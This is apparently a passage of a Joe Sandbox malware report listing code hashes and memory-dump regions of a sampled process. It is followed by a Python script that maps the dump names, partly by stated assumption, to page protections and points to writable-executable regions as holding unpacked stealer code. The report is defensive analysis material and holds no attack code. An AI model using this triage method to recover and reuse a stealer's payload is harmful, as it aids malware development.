                                          • Opcode Fuzzy Hash: 5767332521781d622f37c3cd8866a1986280a7bb15ff3ee2c6d481f28b8c99e6
                                          • Instruction Fuzzy Hash: B541C4F2A085144FE704AA3DDE4532ABADADBD4710F2AC53DDAC4C7788E93859094686
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                           • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 96006c6248215eeefe07cffefb9b9843a7da1e1ce19442f8a11d3d053cf21f8f
                                          • Instruction ID: 4160b72e04f4b0f0e9806d77bb15653e4c65ef6be41bcf8a1c65708779a0135e
                                          • Opcode Fuzzy Hash: 96006c6248215eeefe07cffefb9b9843a7da1e1ce19442f8a11d3d053cf21f8f
                                          • Instruction Fuzzy Hash: 7B8172B411E3849BC774CF09D88869BBBE0BB9A308F10491DD88C8B3A0DFB01545DF96
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                           • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 63f70ce137f78f62f0fb9060444e8093c2442cc6ff0514dcf88eea3e59cc046e
                                          • Instruction ID: 51e185755a37b3fe14192c646d158d24232e89874062ff7b1d8598205f19fe45
                                          • Opcode Fuzzy Hash: 63f70ce137f78f62f0fb9060444e8093c2442cc6ff0514dcf88eea3e59cc046e
                                          • Instruction Fuzzy Hash: 8F11C437B3962147E350CFABDCD86566356EBCA311B1A0535EF41D7202C622E809E290
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                           • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 40ba1dbc3503473f030120c457623b4a7561b7ece2bb5845b6cf65c94c80af15
                                          • Instruction ID: 53f3c964d1126426bb5b3cc9cce6688209805e7422adee005af5b7b835a13fcb
                                          • Opcode Fuzzy Hash: 40ba1dbc3503473f030120c457623b4a7561b7ece2bb5845b6cf65c94c80af15
                                          • Instruction Fuzzy Hash: 9121E5B250C704AFE346AE68EC82BAAFBE5EB58310F16492DE2D5C2610E73594409A57
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 47a782db349c2f56e36837ba339681c369eb1c59d9df0f2ba413b47b08682392
                                          • Instruction ID: 36ec09ba9e5746bacc9d8a4acab04b202dbb6f1aea800ea0a3d2e3860a0eb1c6
                                          • Opcode Fuzzy Hash: 47a782db349c2f56e36837ba339681c369eb1c59d9df0f2ba413b47b08682392
                                          • Instruction Fuzzy Hash: 6DF0277061C3804BD3198B28D89163FB7B0EB83604F10541DE3C2C32D2DB21C8069B09
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d41819a9642c843735be8b4a93df8c2ba0a1f6c7d79a1da51ae6c7ccc4b422ae
                                          • Instruction ID: dde87bacb22c8d1bdaa324b8517cdcf5e423618c15203e8581d33b2431a93803
                                          • Opcode Fuzzy Hash: d41819a9642c843735be8b4a93df8c2ba0a1f6c7d79a1da51ae6c7ccc4b422ae
                                          • Instruction Fuzzy Hash: 5FB09250A282087F00249D0E8C45D7BB6BE92CB640B10600DA408A32148650EC0482FA
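The .sdmp names under "Memory Dump Source" above are the only map the report gives of where the dumped code lives in the process, so it helps to turn them into a region table. The script below is an added example, not part of the Joe Sandbox report: it parses the "Source File" and "Associated" lines (sample text constructed from the entries above, with the stray "Download File" link text left in to show it is tolerated), de-duplicates regions across the repeated blocks, and decodes the fifth dotted field as a Windows PAGE_* protection constant and the seventh as the MEM_IMAGE type. That field assignment is an assumption drawn from the values on this page (0x40, 0x04 and 0x80 are exactly PAGE_EXECUTE_READWRITE, PAGE_READWRITE and PAGE_EXECUTE_WRITECOPY from winnt.h, and 0x01000000 is MEM_IMAGE), not a documented naming scheme, and the helper names are hypothetical.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample: the Source File / Associated lines from this report,
# one of them carrying the "Download File" link residue.
SAMPLE_REPORT = """\
• Source File: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
• Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmp
• Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
"""

# Real winnt.h page-protection constants; that the fifth field holds one is
# an assumption based on the values seen in this report.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_IMAGE = 0x01000000  # winnt.h; assumed to be what the seventh field carries

# Eight dotted fields followed by ".sdmp"; trailing link text is simply ignored.
SDMP_RE = re.compile(
    r"(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<serial>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<index>[0-9A-Fa-f]{8})\.sdmp"
)
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")


@dataclass(frozen=True, order=True)
class Region:
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect, f"0x{self.protect:02x}")

    @property
    def executable(self) -> bool:
        return self.protect in (0x10, 0x20, 0x40, 0x80)

    @property
    def writable(self) -> bool:
        return self.protect in (0x04, 0x08, 0x40, 0x80)


def parse_regions(report_text: str) -> list[Region]:
    """Collect every distinct (base, protect, type) region, sorted by address."""
    found = {
        Region(int(m["base"], 16), int(m["protect"], 16), int(m["type"], 16))
        for m in SDMP_RE.finditer(report_text)
    }
    return sorted(found)


def declared_offsets(report_text: str) -> set[int]:
    """The PE base the report says the dumps are rebased on."""
    return {int(h, 16) for h in OFFSET_RE.findall(report_text)}


def image_base(regions: list[Region]) -> int:
    return min(r.base for r in regions)


def writable_executable(regions: list[Region]) -> list[int]:
    """Bases of pages that are both writable and executable (unpacker targets)."""
    return [r.base for r in regions if r.writable and r.executable]


def summarize(report_text: str) -> str:
    rows = []
    for r in parse_regions(report_text):
        kind = "MEM_IMAGE" if r.mem_type & MEM_IMAGE else f"type=0x{r.mem_type:08x}"
        flag = "  <- W+X" if (r.writable and r.executable) else ""
        rows.append(f"0x{r.base:08x}  {r.protect_name:<24} {kind}{flag}")
    return "\n".join(rows)


if __name__ == "__main__":
    print(summarize(SAMPLE_REPORT))
```

Running it on the sample lists thirteen distinct MEM_IMAGE regions starting at the declared offset 0x950000, of which eleven are writable and executable; in a mapped PE that is the signature of sections whose rights were changed at run time, and those are the dumps worth loading first when looking for the unpacked stealer code.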